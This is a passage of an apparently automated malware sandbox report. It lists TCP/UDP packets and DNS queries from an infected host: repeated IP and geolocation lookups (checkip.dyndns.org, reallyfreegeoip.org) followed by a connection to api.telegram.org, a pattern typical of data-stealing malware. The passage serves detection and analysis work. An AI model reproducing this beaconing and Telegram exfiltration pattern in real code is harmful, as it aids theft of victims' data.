                                              Sep 26, 2024 07:47:28.527196884 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:28.527259111 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:28.532008886 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:28.532021999 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:28.994116068 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:28.994204044 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:28.999283075 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:28.999294996 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:28.999654055 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:29.097460985 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:29.139426947 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:30.175244093 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:30.175314903 CEST44349163188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:30.175369024 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:30.278748989 CEST49163443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:30.296354055 CEST4916280192.168.2.22132.226.8.169
                                              Sep 26, 2024 07:47:30.301208019 CEST8049162132.226.8.169192.168.2.22
                                              Sep 26, 2024 07:47:30.613368034 CEST8049162132.226.8.169192.168.2.22
                                              Sep 26, 2024 07:47:30.663621902 CEST49164443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:30.663693905 CEST44349164188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:30.664189100 CEST49164443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:30.665898085 CEST49164443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:30.665920019 CEST44349164188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:30.823827982 CEST4916280192.168.2.22132.226.8.169
                                              Sep 26, 2024 07:47:30.825961113 CEST8049162132.226.8.169192.168.2.22
                                              Sep 26, 2024 07:47:30.826016903 CEST4916280192.168.2.22132.226.8.169
                                              Sep 26, 2024 07:47:31.178261995 CEST44349164188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:31.190510988 CEST49164443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:31.190546036 CEST44349164188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:31.314234018 CEST44349164188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:31.314685106 CEST44349164188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:31.315290928 CEST49164443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:31.319283009 CEST49164443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:31.349323988 CEST4916280192.168.2.22132.226.8.169
                                              Sep 26, 2024 07:47:31.356477976 CEST8049162132.226.8.169192.168.2.22
                                              Sep 26, 2024 07:47:31.356527090 CEST4916280192.168.2.22132.226.8.169
                                              Sep 26, 2024 07:47:31.370954037 CEST4916580192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:31.376316071 CEST8049165193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:31.376384974 CEST4916580192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:31.376486063 CEST4916580192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:31.381927013 CEST8049165193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:32.016647100 CEST8049165193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:32.035916090 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:32.036014080 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:32.036102057 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:32.036473036 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:32.036518097 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:32.212268114 CEST4916580192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:32.512459040 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:32.516405106 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:32.516459942 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:32.638232946 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:32.638328075 CEST44349166188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:32.638397932 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:32.639214993 CEST49166443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:32.658571959 CEST4916580192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:32.670047998 CEST8049165193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:32.670140982 CEST4916580192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:32.709244013 CEST4916780192.168.2.22158.101.44.242
                                              Sep 26, 2024 07:47:32.716104984 CEST8049167158.101.44.242192.168.2.22
                                              Sep 26, 2024 07:47:32.716177940 CEST4916780192.168.2.22158.101.44.242
                                              Sep 26, 2024 07:47:32.716286898 CEST4916780192.168.2.22158.101.44.242
                                              Sep 26, 2024 07:47:32.721764088 CEST8049167158.101.44.242192.168.2.22
                                              Sep 26, 2024 07:47:33.318691969 CEST8049167158.101.44.242192.168.2.22
                                              Sep 26, 2024 07:47:33.340650082 CEST49168443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:33.340681076 CEST44349168188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:33.340749025 CEST49168443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:33.341217041 CEST49168443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:33.341228962 CEST44349168188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:33.522644043 CEST4916780192.168.2.22158.101.44.242
                                              Sep 26, 2024 07:47:33.810532093 CEST44349168188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:33.860133886 CEST49168443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:33.860146046 CEST44349168188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:33.967493057 CEST44349168188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:33.967576981 CEST44349168188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:33.967737913 CEST49168443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:33.970839977 CEST49168443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:34.030128002 CEST4916780192.168.2.22158.101.44.242
                                              Sep 26, 2024 07:47:34.035480022 CEST8049167158.101.44.242192.168.2.22
                                              Sep 26, 2024 07:47:34.035552025 CEST4916780192.168.2.22158.101.44.242
                                              Sep 26, 2024 07:47:34.100675106 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:34.105541945 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:34.105604887 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:34.108732939 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:34.113549948 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:36.902781963 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:36.928631067 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:36.934495926 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:38.056256056 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:38.070630074 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:38.070658922 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:38.070718050 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:38.071300983 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:38.071314096 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:38.265127897 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:38.455374002 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:38.455528021 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:38.545120955 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:38.547957897 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:38.547969103 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:38.685422897 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:38.685522079 CEST44349170188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:38.685614109 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:38.686180115 CEST49170443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:38.700184107 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:38.705286026 CEST8049169193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:38.705449104 CEST4916980192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:38.728061914 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:38.732878923 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:47:38.732944012 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:38.733093023 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:38.737900972 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:47:39.400791883 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:47:39.416209936 CEST49172443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:39.416249990 CEST44349172188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:39.416328907 CEST49172443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:39.416757107 CEST49172443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:39.416771889 CEST44349172188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:39.606636047 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:40.517016888 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:47:40.517060041 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:47:40.517291069 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:40.517291069 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:40.517472029 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:47:40.519285917 CEST4917180192.168.2.22132.226.247.73
                                              Sep 26, 2024 07:47:40.519325972 CEST44349172188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:40.522463083 CEST49172443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:40.522485971 CEST44349172188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:40.671658039 CEST44349172188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:40.671770096 CEST44349172188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:40.671968937 CEST49172443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:40.672388077 CEST49172443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:40.710793018 CEST4917380192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:40.715923071 CEST8049173193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:40.716034889 CEST4917380192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:40.716159105 CEST4917380192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:40.721157074 CEST8049173193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:41.426959991 CEST8049173193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:41.442573071 CEST49174443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:41.442665100 CEST44349174188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:41.442740917 CEST49174443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:41.443169117 CEST49174443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:41.443192959 CEST44349174188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:41.634669065 CEST4917380192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:42.041104078 CEST44349174188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:42.087415934 CEST49174443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:42.087451935 CEST44349174188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:42.209661007 CEST44349174188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:42.209779978 CEST44349174188.114.97.3192.168.2.22
                                              Sep 26, 2024 07:47:42.209820986 CEST49174443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:42.210505962 CEST49174443192.168.2.22188.114.97.3
                                              Sep 26, 2024 07:47:42.345627069 CEST4917380192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:42.350918055 CEST8049173193.122.6.168192.168.2.22
                                              Sep 26, 2024 07:47:42.350981951 CEST4917380192.168.2.22193.122.6.168
                                              Sep 26, 2024 07:47:42.374087095 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:42.379096031 CEST8049175193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:42.379174948 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:42.379395962 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:42.384222984 CEST8049175193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:42.836105108 CEST8049175193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:42.855077028 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:42.855113029 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:42.855173111 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:42.855561972 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:42.855576038 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:43.038705111 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:43.041966915 CEST8049175193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:43.042145014 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:43.314774036 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:43.317703009 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:43.317748070 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:43.563654900 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:43.563741922 CEST44349176188.114.96.3192.168.2.22
                                              Sep 26, 2024 07:47:43.563791037 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:43.565893888 CEST49176443192.168.2.22188.114.96.3
                                              Sep 26, 2024 07:47:43.600410938 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:43.605633020 CEST8049175193.122.130.0192.168.2.22
                                              Sep 26, 2024 07:47:43.605710983 CEST4917580192.168.2.22193.122.130.0
                                              Sep 26, 2024 07:47:43.626473904 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:43.626506090 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:43.626698017 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:43.627373934 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:43.627393007 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.250016928 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.250190020 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:44.255099058 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:44.255104065 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.255395889 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.258377075 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:44.303401947 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.491128922 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.491305113 CEST44349177149.154.167.220192.168.2.22
                                              Sep 26, 2024 07:47:44.491503000 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:47:44.491878033 CEST49177443192.168.2.22149.154.167.220
                                              Sep 26, 2024 07:48:44.401571035 CEST8049171132.226.247.73192.168.2.22
                                              Sep 26, 2024 07:48:44.401684999 CEST4917180192.168.2.22132.226.247.73

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 07:47:26.010523081 CEST5456253192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:26.016881943 CEST53545628.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:26.025199890 CEST5291753192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:26.031714916 CEST53529178.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:28.514981031 CEST6275153192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:28.526055098 CEST53627518.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:31.355317116 CEST5789353192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:31.361742020 CEST53578938.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:31.364027977 CEST5482153192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:31.370608091 CEST53548218.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:32.023408890 CEST5471953192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:32.034898043 CEST53547198.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:32.676175117 CEST4988153192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:32.682720900 CEST53498818.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:32.700567007 CEST5499853192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:32.708744049 CEST53549988.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:33.328042984 CEST5278153192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:33.340104103 CEST53527818.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:34.042360067 CEST6392653192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:34.048654079 CEST53639268.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:34.093873024 CEST6551053192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:34.100194931 CEST53655108.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:38.063040972 CEST6267253192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:38.070183039 CEST53626728.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:38.706492901 CEST5647553192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:38.712769985 CEST53564758.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:38.714905024 CEST4938453192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:38.721246004 CEST53493848.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:38.721400976 CEST4938453192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:38.727744102 CEST53493848.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:39.407860041 CEST5484253192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:39.415088892 CEST53548428.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:40.695564032 CEST5810553192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:40.701773882 CEST53581058.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:40.703967094 CEST6492853192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:40.710437059 CEST53649288.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:41.435216904 CEST5739053192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:41.442218065 CEST53573908.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:42.356520891 CEST5809553192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:42.363111973 CEST53580958.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:42.367121935 CEST5426153192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:42.373533010 CEST53542618.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:42.843437910 CEST6050753192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:42.854585886 CEST53605078.8.8.8192.168.2.22
                                              Sep 26, 2024 07:47:43.619407892 CEST5044653192.168.2.228.8.8.8
                                              Sep 26, 2024 07:47:43.625776052 CEST53504468.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 26, 2024 07:47:26.010523081 CEST192.168.2.228.8.8.80x4c92Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.025199890 CEST192.168.2.228.8.8.80x8a11Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:28.514981031 CEST192.168.2.228.8.8.80x8ccdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.355317116 CEST192.168.2.228.8.8.80x7da1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.364027977 CEST192.168.2.228.8.8.80x9614Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.023408890 CEST192.168.2.228.8.8.80xd76fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.676175117 CEST192.168.2.228.8.8.80x8778Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.700567007 CEST192.168.2.228.8.8.80x16a0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:33.328042984 CEST192.168.2.228.8.8.80x8b6aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.042360067 CEST192.168.2.228.8.8.80x49bfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.093873024 CEST192.168.2.228.8.8.80x384aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.063040972 CEST192.168.2.228.8.8.80x7c4dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.706492901 CEST192.168.2.228.8.8.80xd27Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.714905024 CEST192.168.2.228.8.8.80xcdebStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721400976 CEST192.168.2.228.8.8.80xcdebStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:39.407860041 CEST192.168.2.228.8.8.80x9683Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.695564032 CEST192.168.2.228.8.8.80x932fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.703967094 CEST192.168.2.228.8.8.80xc4a7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:41.435216904 CEST192.168.2.228.8.8.80x5171Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.356520891 CEST192.168.2.228.8.8.80xee6eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.367121935 CEST192.168.2.228.8.8.80x71c3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.843437910 CEST192.168.2.228.8.8.80x7a15Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:43.619407892 CEST192.168.2.228.8.8.80x3f63Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 26, 2024 07:47:26.016881943 CEST8.8.8.8192.168.2.220x4c92No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.016881943 CEST8.8.8.8192.168.2.220x4c92No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.016881943 CEST8.8.8.8192.168.2.220x4c92No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.016881943 CEST8.8.8.8192.168.2.220x4c92No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.016881943 CEST8.8.8.8192.168.2.220x4c92No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.016881943 CEST8.8.8.8192.168.2.220x4c92No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.031714916 CEST8.8.8.8192.168.2.220x8a11No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.031714916 CEST8.8.8.8192.168.2.220x8a11No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.031714916 CEST8.8.8.8192.168.2.220x8a11No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.031714916 CEST8.8.8.8192.168.2.220x8a11No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.031714916 CEST8.8.8.8192.168.2.220x8a11No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:26.031714916 CEST8.8.8.8192.168.2.220x8a11No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:28.526055098 CEST8.8.8.8192.168.2.220x8ccdNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:28.526055098 CEST8.8.8.8192.168.2.220x8ccdNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.361742020 CEST8.8.8.8192.168.2.220x7da1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.361742020 CEST8.8.8.8192.168.2.220x7da1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.361742020 CEST8.8.8.8192.168.2.220x7da1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.361742020 CEST8.8.8.8192.168.2.220x7da1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.361742020 CEST8.8.8.8192.168.2.220x7da1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.361742020 CEST8.8.8.8192.168.2.220x7da1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.370608091 CEST8.8.8.8192.168.2.220x9614No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.370608091 CEST8.8.8.8192.168.2.220x9614No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.370608091 CEST8.8.8.8192.168.2.220x9614No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.370608091 CEST8.8.8.8192.168.2.220x9614No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.370608091 CEST8.8.8.8192.168.2.220x9614No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:31.370608091 CEST8.8.8.8192.168.2.220x9614No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.034898043 CEST8.8.8.8192.168.2.220xd76fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.034898043 CEST8.8.8.8192.168.2.220xd76fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.682720900 CEST8.8.8.8192.168.2.220x8778No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
